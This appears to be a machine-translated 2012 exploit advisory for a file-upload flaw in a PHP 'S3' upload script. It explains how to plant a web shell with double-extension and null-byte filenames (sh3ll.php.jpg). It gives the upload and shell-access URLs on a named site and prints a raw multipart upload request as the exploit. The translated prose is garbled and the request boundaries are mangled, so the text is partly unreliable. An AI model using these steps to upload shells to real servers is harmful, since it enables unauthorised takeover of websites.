PHP. S3. TO upload the exploit-vulnerability warning-the black bar safety net

2012-08-29T00:00:00
ID MYHACK58:62201234753
Type myhack58
Reporter 佚名
Modified 2012-08-29T00:00:00

Description

PHP S3 upload vulnerability

This web-based vulnerability is more serious, can directly access the shell, is given below exploits the method of

Vulnerability information:

Can any upload the PHP, TXT, JPG, PNG format file

change your shell to sh3ll.php.jpg or sh3ll.php%0%0.1.jpg

Exploit demo:

Use:

hackqing.com/[dir]/up/upload.php

Load the file :

hackqing.com/[dir]/up/img/Sh3ll.php.jpg

Vulnerability is the core code:

1 1 4 7 8 2 9 3 5 8 2 6 9 6 2\r\nContent-Disposition: form-data;

name="MAX_FILE_SIZE"\r\n\r\n1048576\r\n-1 1 4 7 8 2 9 3 5 8

2 6 9 6 2\r\nContent-Disposition: form-data;name="upfile";

filename="sh3ll.php.jpg"\r\nContent-Type: text/plain\r\n\r\n\r\n

-----------------------------1 1 4 7 8 2 9 3 5 8 2 6 9 6 2\r\nContent-Disposition:

form-data; name="pass"\r\n\r\n\r\n--1 1 4 7 8 2 9 3 5 8 2 6 9 6 2\r\nContent-Disposition:form-data;

name="com"\r\n\r\n\r\n-----------------------------1 1 4 7 8 2 9 3 5 8 2 6 9 6 2--\r\n